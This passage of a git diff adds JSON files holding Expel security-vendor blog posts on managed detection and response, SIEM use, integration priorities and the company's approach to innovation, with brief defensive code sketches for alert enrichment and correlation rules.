This Market Guide lends clarity on where to start, core capabilities to consider, and optional capabilities that can bolster your MDR deployment. In fact, Gartner\u00ae outlines one of the first steps you should take: Define specific required outputs (incident ticket structure, reports) and goals that address defined use cases, before engaging with a provider. As with any outsourcing initiative, if outcomes are not defined, regardless of what service provider is used, the chance of success will be lessened. Buyers should also be cautious of overemphasizing the value of SLAs as part of detection-and-response-driven services. Going a layer deeper, a few of the core capabilities Gartner recommends are: 24\u00d77 remotely delivered detection and response functions. Turnkey delivery, with predefined and pretuned processes and detection content. Triage, investigate and manage responses to all discovered threats, regardless of priority with no limitations on volumes or time dedicated to the discovery and investigation process. And while you\u2019ll need to download the full report to get all the recommendations, market directions, recommended capabilities, and vendors in the MDR space (including yours truly), here\u2019s a taste of core MDR and adjacent services to consider: Download your copy of the Market Guide for Managed Detection and Response Services from Gartner here . This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from Expel. Attribution: Gartner, Market Guide for Managed Detection and Response Services, Pete Shoard, Al Price, Mitchell Schneider, Craig Lawson, Andrew Davies, 4 February 2023. Disclaimer: GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved. Gartner does not endorse any vendor, product or service depicted in its research publications and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner\u2019s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose." +} \ No newline at end of file diff --git a/who-ya-gonna-call-to-make-the-most-of-your-siem-data.json b/who-ya-gonna-call-to-make-the-most-of-your-siem-data.json new file mode 100644 index 0000000000000000000000000000000000000000..831b92073c72c8e12be52a1dc8cc7654f1b2da94 --- /dev/null +++ b/who-ya-gonna-call-to-make-the-most-of-your-siem-data.json @@ -0,0 +1,6 @@ +{ + "title": "Who ya gonna call (to make the most of your SIEM data)?", + "url": "https://expel.com/blog/who-ya-gonna-call-to-make-the-most-of-your-siem-data/", + "date": "Oct 31, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Who ya gonna call (to make the most of your SIEM data)? Security operations \u00b7 4 MIN READ \u00b7 DAVE JOHNSON AND TYLER ZITO \u00b7 OCT 31, 2022 \u00b7 TAGS: Cloud security / MDR \u201cDetectin\u2019 makes us feel good!\u201d Are you troubled by strange alerts in the middle of the night? Do you experience feelings of dread in your on-prem or cloud environment? 
Have you or your security team ever seen a spook, specter, or ghost malware outbreak that you had trouble detecting quickly and remediating? For some security professionals, even the briefest consideration that a SIEM might not be the centerpiece of their security stack is a spooky, Shyamalan-esque, jumpscare movie they\u2019d only watch from behind the couch (with popcorn, of course). But Expel ain\u2019t afraid of no ghosts\u2026 For the record, we aren\u2019t The Gatekeeper of SIEM. We\u2019re The Keymaster, helping generate additional security value from your environment directly without having to rely entirely on a SIEM. In addition, as a somewhat radical challenge to industry trends, we can cross the streams between SIEM and the rest of your technology. We work with the tech our customers have in place, including their existing SIEM alerts and custom notables, to tailor the service to their requirements. The result combines top-shelf 24\u00d77 SOC and best-of-breed security technologies optimized for your technical and business context, improving visibility and mean time to detect and remediate (MTTD/MTTR). Fundamentally, what is a SIEM, anyway? Traditionally, a SIEM is a grouping of rules and logic that extract interesting events from a large set of data which, up until recently, was the only choice many of us had in trying to make sense of all the spooky log stuff coming out of our environments. We\u2019ve spent the past decade or so using SIEMs to solve a problem that other technologies are also solving (or as an add-on\u2013agents, for example). Endpoint detection and response (EDR), intrusion detection systems (IDS), and intrusion prevention systems (IPS), cloud access security brokers (CASBs), privileged access management (PAM)\u2013there are plenty of acronyms and abbreviations to choose from. This doesn\u2019t mean SIEMs are no longer useful\u2014they absolutely are\u2014but the ecosystem of high-fidelity solutions is expanding and evolving to address the complexity of evolving attacker methodology. But now a different problem rises from the grave: \u201chow can we keep track of it all?\u201d Should we try to scale by adding more rules and building a bigger SIEM? Or maybe elevate to a higher plane of existence where there is no SIEM, only ruuuuules! (and detections). Let\u2019s say you did decide to go the route of building a bigger SIEM. Consider a known constant, like the general size of a Twinkie. If we scale a standard SIEM to keep pace with the requirements of new telemetry and the massive, increasing complexity of data, we\u2019ll end up with a SIEM Twinkie weighing in at several hundred pounds. You\u2019re likely going to need even more people to lift that giant SIEM Twinkie than you currently have today. Let\u2019s talk about getting to that higher plane and making that giant SIEM Twinkie a more manageable size, shall we? Historically in the cybersecurity service industry, when someone asks if your product is a SIEM, you say yes! (or something to that effect) . Except here, because Expel isn\u2019t a SIEM. We\u2019re a security operations provider that incorporates SIEM alert data with all the other relevant sources of security information in your environment. The whole is greater than the sum of the parts, and this approach magnifies the detection and response impact of your security stack and team. The Expel Workbench\u2122 is the next step in the technical evolution of security monitoring. 
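To ground the "grouping of rules and logic" definition above, here is a minimal sketch of the kind of correlation rule a SIEM traditionally runs: a burst of failed logins from one source followed by a success. The threshold, window and field names are illustrative.

```python
# Minimal sketch of a classic SIEM-style correlation rule: N or more failed logins
# from a single source IP inside a time window, followed by a successful login.
from collections import defaultdict, deque
from datetime import timedelta


def brute_force_then_success(events, threshold=10, window=timedelta(minutes=5)):
    """events: dicts with 'timestamp', 'src_ip', 'user', 'outcome', sorted by time.
    Yields (src_ip, user, timestamp) leads worth a closer look."""
    failures = defaultdict(deque)  # src_ip -> timestamps of recent failures
    for event in events:
        ip, ts = event["src_ip"], event["timestamp"]
        recent = failures[ip]
        while recent and ts - recent[0] > window:
            recent.popleft()  # drop failures that fell out of the window
        if event["outcome"] == "failure":
            recent.append(ts)
        elif event["outcome"] == "success" and len(recent) >= threshold:
            yield ip, event["user"], ts
            recent.clear()
```

Multiply this by hundreds of rules and dozens of log sources and you get the several-hundred-pound Twinkie problem described above.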
Ultimately, whether you believe in the existence of SIEM and its power to improve visibility in your cybersecurity environment, or not, we can help. Now, when there\u2019s something strange in your environment, the SIEM has to know what to look for, and if it doesn\u2019t then it won\u2019t know what to alert you about. An integrated platform (like Workbench) knows exactly what to watch for. What\u2019s abnormal? What\u2019s paranormal [fx: lightning flash, thunderclap, evil laughter] ? A modern, sophisticated SOC, where your existing SIEM is a part of the set-up, boosts time to response and efficiency, improving triage and enhancing investigations. For example, let\u2019s say we get an alert for a host named \u201cStayPuft\u201d engaging in malicious-looking user behavior. Additionally we\u2019ve noticed, user \u201cElvis\u201d is doing something strange. Because of the way we use automation for in-depth initial triage and correlation, our analysts have the time they need to investigate the user in detail. Who is \u201cElvis\u201d and when was the last time we saw them log in? Has there been any other strange behavior here? Is this the kind of behavior we expect from this user in this situation? Or is it completely harmless and would never ever possibly cause any sort of destruction? Armed with a full complement of relevant information from different sources and defensive layers, analysts can report back to the customer, quickly and accurately, with insight into appropriate next steps. Customers who import their finely honed SIEM into a tool like Workbench can translate all the human hours invested in development into customized rules for their special use cases. In other cases, they may realize they no longer need a SIEM, only rules\u2014specifically, all the proprietary detection rules that come with Expel Workbench that have direct relevance to the security tools you have in your stack. Imagine firing a beam of high-energy positrons at the malicious entity to \u201cExpel\u201d their activity from your environment into a containment vessel. (See what I did there? Expel? Get it?) Everything I\u2019m describing also lowers your overhead management and time spent on your SIEM. You literally get the best of both dimensions. There\u2019s a better, less scary way to team up and make the challenge of fielding security alerts much easier and actually enjoyable. If you have questions about how we can help you do exactly that, we\u2019d be happy to talk. We hope you enjoyed the absolutely necessary original Ghostbusters movie references. Have a Happy Halloween and may nothing too spooky happen over the holiday. But if it does\u2026. Who ya gonna call?" +} \ No newline at end of file diff --git a/why-don-t-you-integrate-with-foo.json b/why-don-t-you-integrate-with-foo.json new file mode 100644 index 0000000000000000000000000000000000000000..ac1f933e4c4c7d34c15f4acc994a964cadb218ef --- /dev/null +++ b/why-don-t-you-integrate-with-foo.json @@ -0,0 +1,6 @@ +{ + "title": "Why don't you integrate with [foo]?", + "url": "https://expel.com/blog/dont-integrate-with-foo/", + "date": "Oct 6, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG Why don\u2019t you integrate with [foo]? Security operations \u00b7 8 MIN READ \u00b7 YANEK KORFF \u00b7 OCT 6, 2020 \u00b7 TAGS: MDR / Tech tools When you\u2019re looking for a managed security provider that purports to \u201cwork with the tech you already have,\u201d you might be dismayed to hear that there\u2019s something you have we don\u2019t integrate with. 
How can that be? Is it just not something we\u2019ve built yet? Well, why not? I\u2019ll tell you. By the end of this post you\u2019ll understand why our thoughts on integration are likely different from what you\u2019ve heard elsewhere, and what this means for you if you want to work with Expel. Building a model to prioritize needles, not haystacks We\u2019ve all heard the phrase, \u201cIt\u2019s like looking for a needle in a haystack.\u201d Based on our many years spent working in the security industry, we\u2019ve discovered that collecting piles of hay (AKA security signals) and hoping there\u2019s a needle or two in there isn\u2019t the most efficient way for us to protect anyone\u2019s data and infrastructure. That\u2019s when we also realized that more integrations doesn\u2019t mean better results. In fact, it often results in lots of noise and a bundle of false positives. However, there\u2019s still a general mindset in our industry that the best move is to put all the data in one spot and then begin doing all the things. A pile of data = amazing results? Not always. So why does everyone still love \u201chaystacks\u201d of data? To understand this, let\u2019s rewind the clock about 20 years and see where we\u2019ve come from as an industry. When it comes to answering challenging questions and getting value out of data, we\u2019ve historically followed the business plan popularized (or documented?) by the Underpants Gnomes of Southpark . It goes like this: Collect Underpants ? Profit! Sound familiar? Everybody loves the idea of gathering a pile of data and expecting amazing results somehow later on. Applying the lens of the Gartner hype cycle to new technologies like data warehousing, business intelligence and big data analytics \u2026 you\u2019ll notice an uncanny parallel to this very same business model. A different approach: Asking questions first At Expel, we believe in taking a different approach when you\u2019re looking to get value out of data. It goes something like this: Identify the questions to which you\u2019ll want answers. Identify the speed at which you\u2019ll want these questions answered. Identify the data from which you\u2019ll derive the answers. Organize the data to support these use cases. Profit! Go back to step 1 and revisit periodically. Unfortunately, this approach is twice as long as the last one. On the other hand, it works. Let\u2019s take a look at it in the context of security operations. How do we come up with questions? TL;DR: We\u2019re trying to find out if there\u2019s something \u201cbad\u201d happening in the environment we\u2019re monitoring. This requires us to first ask ourselves a few questions. At Expel, we\u2019ve come up with a standard set of initial follow-up questions that inform what we do if we do spot something bad. But how do we know if something\u2019s bad? Well, our best bet is to have a lot of relevant context. For example, what technology generated the alert? Was the alert generated from an assumed role in AWS , if so \u2013 who assumed it? Has this user done this before? Did that user assume other roles at about the same time? What\u2019s the historical use profile of that source user? The list goes on. Some of this context we can collect up front because it comes along with the alert. Other context may require follow-up queries against other systems or historical records on what is \u201cnormal\u201d in the environment. 
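Those context questions are exactly the kind of thing that's cheap to automate once you decide they matter. Here is a minimal sketch of enriching an AWS AssumeRole alert with a user's history, assuming you already have searchable CloudTrail-style records on hand; the field names are illustrative.

```python
# Minimal sketch: bolt historical context onto an AWS AssumeRole alert so the
# analyst immediately sees whether this user has done this before.
from datetime import datetime, timedelta


def enrich_assume_role_alert(alert, history):
    """alert: dict with 'user' and 'role_arn'. history: prior AssumeRole events
    (e.g. parsed CloudTrail records) as dicts with 'user', 'role_arn', 'timestamp'."""
    prior = [e for e in history if e["user"] == alert["user"]]
    same_role = [e for e in prior if e["role_arn"] == alert["role_arn"]]
    cutoff = datetime.utcnow() - timedelta(days=30)
    return {
        **alert,
        "assumed_this_role_before": bool(same_role),
        "assumptions_of_this_role_last_30d": sum(e["timestamp"] >= cutoff for e in same_role),
        "distinct_roles_assumed_by_user": len({e["role_arn"] for e in prior}),
    }
```

The analyst then sees "first time ever" versus "does this every morning" without running a single query by hand.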
Expel alert for suspicious login post-optimization with authentication history and frequency Why does speed matter? Because we triage a lot of alerts with a combination of technology and smart analysts. And chasing down the same kind of supporting information repeatedly is exhausting (and therefore, better to automate). When you\u2019re looking at alerts, the better the context you have the faster you can determine if what you\u2019re looking at is for sure bad, definitely a false positive or inconclusive. If an alert isn\u2019t definitely bad or definitely good, it needs follow up. We need to take time to investigate. Time is still of the essence here so we don\u2019t want to drag our feet, but we do this work substantially less often than we do triage work overall so we can afford to look around at potentially interesting data a bit. Another factor to consider is when we\u2019re doing investigations, the questions we ask aren\u2019t going to be quite as cookie-cutter. They can vary widely based on the alert and its surrounding initial context. Bottom line: We\u2019re going to do a lot of triage, and we\u2019re going to do it quickly. We need a lot of context to help streamline (and potentially automate major portions of) this process. Inconclusive results are less frequent, the questions are hard to predict and will vary based on the situation. Getting answers using the old model Let\u2019s take a look at what happens when we use the underpants business model for security operations. We collect logs from everywhere and put them in one giant pile. We write some rules that try to make sense of this and create a huge volume of alerts. These alerts have limited context so we have mostly inconclusive results. We\u2019re not sure what to automate, so we throw people at the problem. I like to call this the \u201clet\u2019s build haystacks so we can search for needles in them\u201d approach. We\u2019re firmly in the category of \u201cbiased dirty vendor\u201d here, so take this next statement with the appropriate grain of salt. Many of the security operations approaches we see in place today resemble this old model. When you see MDRs where SIEM is the foundation or there\u2019s co-managed SIEM offerings, you\u2019re probably looking at this model in action. We don\u2019t feel like this model works, so we approach things a bit differently. Applying the Expel model to security data Our approach is borne from both experience and several years of data that tells us the vast majority of incidents\u2019 initial leads come from specific vendor technologies that generate high quality alerts. First, we collect only alerts (not logs) that come from overall high quality sources, i.e. hay that looks like needles in the first place. Yes, Andrew, we know there\u2019s an exception when it comes to our cloud integrations . Our alerts probably come with decent context already depending on what tech generated them. An EDR tool is a great example of a context-rich alert data source. Next, based on the alert and initial context, there\u2019s other context we can grab from different systems. Let\u2019s automate those pivots and data grabs. For some alerts, it may be possible to grab additional automated context without pivoting on much data. For example, what else happened on this system within +/- 5 minutes? What other systems communicated with this IP address? We now have rich context that enables our security analysts ( or robots ) to make good decisions relatively quickly. 
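To make those automated pivots concrete, here is a minimal sketch of what that kind of enrichment can look like. It is not Expel's actual code; the Alert fields and the two data-source callables are hypothetical stand-ins for whatever EDR, SIEM, or cloud APIs are available in a given environment.

from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Callable, Iterable

@dataclass
class Alert:
    hostname: str
    source_ip: str
    observed_at: datetime

def enrich_alert(
    alert: Alert,
    events_for_host: Callable[[str, datetime, datetime], Iterable[dict]],
    hosts_talking_to: Callable[[str], Iterable[str]],
    window_minutes: int = 5,
) -> dict:
    # Gather the context an analyst would otherwise chase down by hand.
    start = alert.observed_at - timedelta(minutes=window_minutes)
    end = alert.observed_at + timedelta(minutes=window_minutes)
    return {
        # What else happened on this system within +/- 5 minutes?
        "nearby_events": list(events_for_host(alert.hostname, start, end)),
        # What other systems communicated with this IP address?
        "peer_hosts": sorted(hosts_talking_to(alert.source_ip)),
    }

# Stubbed data sources so the sketch runs end to end.
def fake_events(host, start, end):
    return [{"host": host, "event": "new_service_installed"}]

def fake_peers(ip):
    return {"web-01", "db-02"}

context = enrich_alert(
    Alert("web-01", "203.0.113.7", datetime(2020, 10, 6, 14, 30)),
    events_for_host=fake_events,
    hosts_talking_to=fake_peers,
)
print(context)

In practice each callable would wrap whatever API the relevant technology exposes, and the same pattern extends to questions like who assumed a given AWS role or what a user's normal login history looks like. The point is that when the questions are fixed, the data gathering can be automated.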
As we watch this play out, if we keep close track of what analysts do next, we\u2019ll continue to learn how we can automate the process. Now we\u2019re left with a much smaller volume of investigations and much more time in our day . We don\u2019t need to answer the next set of questions with quite as much speed, because (1) the frequency of this work is way lower than for alerts and (2) we\u2019re going to have to apply more human judgement. What does this mean for integrations? The primary advantage of a tech integration with a system that can collect context and orchestrate actions is speed and automation. When questions are predictable and the repeatability of getting answers means that speed provides a huge time advantage\u2026 that\u2019s when integrations make the most sense. The disadvantages of integrations are twofold: you have to build them, and you have to maintain them.That\u2019s time you could otherwise be spending making your analysts more effective. So to figure out what we should prioritize from an integration perspective, let\u2019s look at how we can get answers to questions in the timeframe in which we need them. We think about four integration levels to support different degrees of predictability and urgency. Note that the amount of work required increases by level. Levels of integration Level 1: Accessible When predictability of question and urgency are lower, it\u2019s important that we can get the data, but we don\u2019t need an integration. This fits well into the kinds of data we use during an investigation versus during initial triage. A great example of this is a feature we call \u201cpivot to console.\u201d There are security technologies in play in some of our customer environments that either don\u2019t have APIs that allow us to gather additional context or historically have not generated signal that would have resulted in the identification of an incident. But they might support understanding what happened during one. For these technologies, our analysts can pivot to that tech\u2019s console directly through the Expel Workbench, and access the data there. Tracking this activity also helps us prioritize what tech we might want to integrate. Level 2: Indirect, via SIEM Most of the data in most SIEMs we\u2019ve worked with has been useful when paired with high-quality security signal. But the events, and many times the alerts produced by SIEMs themselves, are rarely the initial lead for an incident. We\u2019ll want to pull this data in through our Expel Assembler and correlate, via automation, relevant context into our overall alert stream. An example of this might be authentication failures that indicate brute-forcing. Level 3: Direct, uni-directional When we\u2019re looking at a data source that provides reasonably good security signal, or there are effective ways to filter the incoming data so that only the high-quality signal gets through, we\u2019ll want to integrate directly. Speed in this case is important both in finding a useful initial lead and perhaps in providing context. An example here might be some perimeter NGFW or IPS/IDS solutions that have good APIs and alerts with decent context. Level 4: Direct, bi-directional Technologies we\u2019d integrate in a bi-directional fashion not only provide high-quality security signal \u2013 the product on the other end can be modified to behave differently on the fly based on information we\u2019re seeing. 
It also likely has its own query ability where we can ask a set of predefined questions and get answers quickly (we like to say the quality of your investigation is rooted in the questions you ask). These technologies are essential to high-quality triage and tend to get used quite a bit during investigations. EDR technologies fit well into this category. What does this mean for me? If you\u2019re looking to work with Expel, this model should help explain how we think about prioritizing integrations and which integrations provide the most value in the context of security operations. We spend most of our time on the investigative leads that have the highest likelihood to be an actual incident. Which means they\u2019ll require action \u2013 fast. The more time we spend chasing our tails on alerts (or events) that don\u2019t matter, the more time we waste and the higher the risk we\u2019ll miss the important stuff. And what\u2019s \u201cimportant\u201d is contingent on each of our customers\u2019 unique environments. Which means we\u2019re also going to be spending a lot of time getting to know you. All the more reason why we don\u2019t want to waste time journeying on paths to nowhere. From an integrations standpoint, this means we put vendor technologies (that we haven\u2019t integrated) into three major buckets: We\u2019re interested in building this integration (levels 3 & 4), but haven\u2019t gotten to it yet. This is probably because we haven\u2019t seen this widely deployed among our base of customers and prospects with whom we\u2019ve spoken to date. We\u2019ve decided not to build a direct integration, because we can access that data or support investigations as needed through a SIEM with which we integrate (level 2). We\u2019ve decided not to build an integration at all (ever) because that data isn\u2019t used often enough for the work to be worth it (level 1). Follow @reefhack As everyone is well aware, the landscape of security technologies is immense and prioritization is critical \u2013 both for integrations and alerts themselves. Because technologies are always changing and growing, a given tech that we evaluated may have moved from one category to another. If you ever feel like we\u2019ve got an integration in the wrong bucket, we\u2019re always willing to listen and re-evaluate. I hope this helped shed some light on how and why we do things here at Expel \u2013 and maybe even inspired you to learn more. We\u2019re always happy to chat ." +} \ No newline at end of file diff --git a/why-expel-doesn-t-do-r-d-expel.json b/why-expel-doesn-t-do-r-d-expel.json new file mode 100644 index 0000000000000000000000000000000000000000..b6dee9798bd16d9c1888c7decd0143b2439b8c91 --- /dev/null +++ b/why-expel-doesn-t-do-r-d-expel.json @@ -0,0 +1,6 @@ +{ + "title": "Why Expel doesn't do R&D | Expel", + "url": "https://expel.com/blog/why-expel-doesnt-do-rd/", + "date": "Aug 16, 2018", + "contents": "Subscribe \u00d7 EXPEL BLOG Why Expel doesn\u2019t do R&D Expel insider \u00b7 11 MIN READ \u00b7 PETER SILBERMAN \u00b7 AUG 16, 2018 \u00b7 TAGS: Framework / Great place to work / Mission I recently introduced myself to a new investor as \u201cDirector of Innovation.\u201d He looked at me like I\u2019d just said I was a Disney Imagineer. Now, I love a good princess flick as much as anyone but I\u2019m no Imagineer. At any other company, I\u2019d be a director of R&D. But as the clickbaity (sorry) title says, we don\u2019t do R&D at Expel. 
At Expel we\u2019ve consciously chosen to avoid the term \u201cR&D\u201d to define a team, a job role or anything else. Instead, we use words like \u201cexperiments\u201d or \u2026 \u201cinnovation.\u201d A lot of thought went into this decision. You see, we\u2019re trying to challenge a lot of the standard ways managed services operate and that means we need to constantly challenge ourselves to do things in new ways and not just cut and paste processes from our past just because \u201cwe\u2019ve always done it that way.\u201d That includes R&D. Or, in this case, innovation. ========================= But first \u2026 a brief disclaimer ========================= Before I dive in though let me set the record straight on a couple things. This blog outlines research in the field of cybersecurity. I\u2019m sure some of the challenges I describe exist in other industries, but I don\u2019t have the experience to talk about them in that context. I\u2019m personally guilty of many of the bad behaviors we\u2019ll discuss. Expel\u2019s approach tries to address some of the challenges I\u2019ve both witnessed and experienced. Finally \u2026 yes, I know not every research group has all of the challenges I\u2019m about to outline. And \u2026 yes, I know not every researcher exhibits all the behaviors I\u2019m about to outline. And \u2026 yes, I\u2019m sure you and your group have none of these challenges. What\u2019s in a name? Quite a bit, it turns out. Think about it. R&D defines a group of people. You either belong or you don\u2019t. At Expel, we believe anyone can come up with a game changing idea. While some folks in the company are more focused on experimentation, we don\u2019t want to exclude anyone. We view innovation as the constant flow of ideas from anywhere in the company to a backlog that is actioned by individuals or teams across an organization. This means that everyone with a good idea or desire should be able to participate. That\u2019s why we choose the term innovation. Anyone can be \u201cinnovative.\u201d But you can\u2019t describe yourself as \u201cresearch and development(y)\u201d, especially if you\u2019re not in the group. There\u2019s also a flaw baked into the name itself. Research and development defines a workflow. And, just as its name suggests, a research group does research first and then develops a solution to a problem. But too many research groups view their job as done once they\u2019ve handed off their idea to engineering. Too often, they don\u2019t have any skin in the game when it comes to getting that solution into production. If the solution falls apart in engineering, culturally, they aren\u2019t encouraged to see that as a failure. Instead, they\u2019re more likely to end up in a food fight with engineering (and possibly product management). You may recognize some of these statements: R&D to engineering: \u201cYou move too slow\u201d R&D to engineering: \u201cThis feature is way more important than Windows X backwards compatibility!\u201d Engineering to R&D: \u201cEverything you hand us works in 10% of situations.\u201d Engineering to R&D: \u201cThis isn\u2019t engineering quality code, rewrite it.\u201d How to create a healthy innovation backlog A healthy research (or innovation) backlog typically includes a bunch of tactical ideas that are being researched to solve day-to-day challenges the company faces. But we think the backlog also needs to include what we call \u201ccrazy town\u201d ideas (sometimes called \u201cmoonshots\u201d). 
These ideas probably don\u2019t correlate to the day-to-day pains and problems your company faces. They\u2019re forward-looking \u2026 and, as we like to say, anticipate where the puck is going ( #ALLCAPS ). Having a diverse innovation backlog is critical. But when a company has a traditional R&D structure (that is, when a group is labeled \u201cR&D\u201d), it\u2019s effectively telling the rest of the company, \u201cHey these are the people to come up with new ideas.\u201d Flip it around and what employees can hear (or think) is, \u201cWell, my ideas don\u2019t matter so I won\u2019t think critically or offer feedback.\u201d Or, perhaps, \u201cWell, since I\u2019m not on the R&D team, I\u2019m going to research over here in a corner and not tell anyone about it.\u201d Or, worst of all, \u201cI can\u2019t participate in R&D so I\u2019m going to take my ideas to another company.\u201d Innovation is a company-wide activity. Having a backlog of ideas siloed off in R&D isn\u2019t an effective way to tackle innovation. Read on to see how we\u2019ve tried to approach things differently. Three signs that your R&D team is stifling innovation It can be hard, at first, to recognize when R&D has put up unnecessary hurdles. Nobody picks up a bullhorn and announces them. They\u2019re more subtle and silent. Here are three signs that you\u2019ve got them. There\u2019s no single view of all research projects: No one person can identify project owners, deduplicate similar projects, track project status, etc. This lack of visibility can impact cost and engineering velocity. Great ideas stay hidden: New ideas that are great may never get brought up. If you\u2019re finding employees are contributing to or creating their own open source projects that\u2019s a possible sign your innovation is going elsewhere. A-ha! Engineering: Large projects stay hidden until a great big reveal, ambushing teams across the company who could have been helpful / involved. You\u2019re solving irrelevant problems: Over time, your R&D group will likely move further away from relevant problems. Then, they\u2019ll wonder why other teams aren\u2019t bringing up new issues for them to tackle. If your R&D group is landing new projects, but the projects aren\u2019t well received there\u2019s a good chance they\u2019re growing disconnected from the day-to-day challenges your company is facing. This happens all the time in security where challenges often change on a daily or weekly basis. If any of these warning signs sound familiar you probably need to rethink your approach to how you innovate. Building an effective innovation engine (aka what I\u2019ve done at Expel) I was one of the first employees at Expel, so the only thing I could do was innovate. But, as a new organization, it also gave me a unique opportunity to experiment with new cultural norms that favor innovation, reward failures and involve everyone. Here are four things we\u2019re doing. Zero Day indoctrination Expel\u2019s culture is unique. We\u2019re a transparent managed security provider and transparency is core to our culture. Every new employee listens to a presentation called the Expel Palimpsest. It explains the fundamental tenets of our culture. And it includes this slide. This slide summarizes Expel\u2019s overall approach to innovation \u2013 it involves everyone and it starts on day zero. The innovation slides are aimed at everyone \u2013 not just our security analysts or engineers. Now, a single slide doesn\u2019t create a culture. 
That comes from day-to-day reinforcement of the messages on the slide with actions. One way we reinforce that is through a weekly experiment meeting and our monthly all hands meeting. Weekly experimentation meeting There are three main goals of our weekly experimentation meeting: Review new ideas (with a focus on prioritization). If we\u2019re going to consider an idea for prioritization, this is where we define concrete next steps that include failure/success criteria for the first pass. It\u2019s a delicate balance when a new idea comes in that isn\u2019t worth actioning. We usually encourage them to think more about their idea while exposing them to alternatives to what they proposed. As you build trust, you\u2019ll find you\u2019re able to more directly say this is probably not worth actioning because of X Y Z. Update status of ongoing experiments. For experiments that are already underway we like to focus on what progress has been made, discussing ideas about how to improve them and identifying (and clearing) roadblocks that might slow it down. Review results from individuals or teams. When we review the results of an experiment there\u2019s a lot of discussion. Did it fail or succeed? If it failed, do we want to try something different or call the whole experiment a failure? If it succeeded, is it still a high priority experiment? A different person runs our weekly meeting every week. Changing up who leads it is important; it breaks up the monotony and allows individuals to focus discussion on what matters most from their perspective. Changing who runs the meeting also reinforces that innovation is democratized across the whole company. Case in point, last week one of our badass interns ran the meeting. Anyone at Expel can attend the experiments meeting and any individual or team can work on a prioritized experiment. We use Trello to track our ideas as experiments. The diagram below outlines the various states an experiment can live in as it moves from concept to completion. Phases of an experiment An important note: These phases are specific to experiments related to detection, hunting, and response. The phase may differ if we were doing different types of experiments (for example, evaluating new database performance). Scrub \u2013 This is where new ideas go. Every month at our company all hands we acknowledge everyone who submitted a new idea, regardless of what the outcome was. Untested ideas \u2013 After we scrub an idea, we move it to \u201cuntested\u201d unless we\u2019re able to resource it immediately. We try to keep this prioritized, but \u201ctry\u201d is the operative word there. Test in progress \u2013 At this phase, we\u2019ve decided to see how viable the idea is. We do our best to scope these tests so they have a quick turn around \u2013 a week or two on an initial idea is ideal (though there are exceptions). The goal here is to see if the concept holds up at some small scale. Note: at this point and going forward any experiment/idea can move from a given phase in the workflow to either \u201cblocked\u201d or \u201cfailed\u201d state. If we fail we\u2019ll have a mini post-mortem write up about what we tried, where we failed and anything we would do differently. That way if we want to pick up a failure a year from now we can recall what happened. Viable \u2013 If the test was successful, where success is reviewed and determined by everyone attending the weekly meeting, the experiment goes into the \u201cviable\u201d state. 
This state is the queue where engineering (or researchers with an engineering background) can go to pick up work. The queue is also another point where we prioritize. We can take resources off of other projects to move something into a release state if we think it\u2019s that important. Release: experimental \u2013 Once we\u2019ve taken the viable idea and resourced it to get it quickly into production, the idea/feature/experiment is marked as \u201cExperimental.\u201d This means the only people reviewing the output are those involved in the experiment and possibly one customer. Release: limited availability \u2013 At this phase, we\u2019ve reviewed the experimental results, run the experiment on varying data types/sizes and we\u2019re reasonably confident it\u2019s stable, meaning the variance is limited. Once an experiment gets to this phase we\u2019ve got our most senior analysts looking at it. Release: general availability \u2013 Finally, when an idea becomes generally available, it means we\u2019ve got strong documentation, monitoring, logging and support. We\u2019ve had two or three associate analysts review it, and they were able to consistently draw the same conclusion. Associate analysts are generally analysts who are working their first security job. Two critical partners: internal and external customers Our internal customers for the experiments are involved in the process from inception to delivery. Heck, it may have been their idea in the first place and they just didn\u2019t have the dev skills to execute it. By meeting with any and all stakeholders, everyone gets an opportunity at every phase to ask questions like, \u201dIs this still the most important thing we should resource?\u201d so we can continuously prioritize experiments that have (or could have) an impact. Too often, researchers go heads down for three months, come back up and the ground has shifted out from under them so that the problem they have solved no longer exists because of _______. We also involve our customers as early as possible \u2013 even at the experimental release stage. It\u2019s one of our core tenets. We\u2019ll talk to the customer before we run an experiment, so they know we\u2019re going to try something new. Then, after the experiment, we provide results even if it went poorly. While this approach works for us, you\u2019ll have to figure out how and when you want to engage customers. We\u2019ve found that by engaging customers early, they get the opportunity to offer feedback (which they like) and we learn things early in the process that ultimately save us time. Through these conversations, trends can emerge. You\u2019ll know you\u2019ve really hit the win button when customers are proactively engaging you with new ideas. Yay! Another failure. If fear of failure is part of your culture it will squash creativity. You\u2019ll always hit your target because you aren\u2019t aiming outside your comfort zone. This is very dangerous for the longevity of any company (unless you are flush with cash and can acquire companies who don\u2019t fear failure). If you\u2019re transparent about your experimental results, you naturally destigmatize the fear of failure. And when the whole company sees experimentations at all levels of the business it gets even more interesting. The greater danger for most of us lies not in setting our aim too high and falling short; but in setting our aim too low, and achieving our mark. 
\u2013 Michelangelo As a young company that\u2019s still growing, we want to fail fast, and failures have to be applauded. Again, we make sure that we\u2019re walking the walk \u2013 at the highest levels. A director saying \u201cgreat job failing guys that\u2019s what we want\u201d doesn\u2019t have the same impact as the CEO standing up in front of the company month after month and saying \u201cWe\u2019ve got to fail more.\u201d The importance of celebrating failure in a company is that it removes the pressure of always being right. This pressure can swallow up impactful ideas and prevent them from being shared. Reed Hastings CEO of Netflix summarized this sentiment well: \u201cOur hit ratio is way too high right now,\u201d Hastings said. \u201cSo, we\u2019ve canceled very few shows \u2026 I\u2019m always pushing the content team: We have to take more risk; you have to try more crazy things. Because we should have a higher cancel rate overall.\u201d \u2013 Reed Hastings The approach I\u2019ve outlined here may or may not work at your company. The point is, that you should always be evaluating how you\u2019re innovating (or R&Ding). At Expel, we\u2019re continually trying to figure out ways to involve more people in the innovation process. A new initiative we\u2019re starting internally is \u201ctwitch for innovation\u201d where we set up fixed times to hold Zoom conference screen shares. The person sharing their screen talks about how they\u2019ll work on an experiment, and actually does a bunch of the research with people watching. Anyone in the company can join the session, watch what they do, how they think and ask questions. This idea isn\u2019t new. In fact, well-known researchers like Cody Pierce , and Silvio Cesare have been live streaming various research sessions. Being able to watch a research professional is invaluable. There\u2019s always something to learn no matter how experienced you are. Eventually, we\u2019d love for customers to be able to 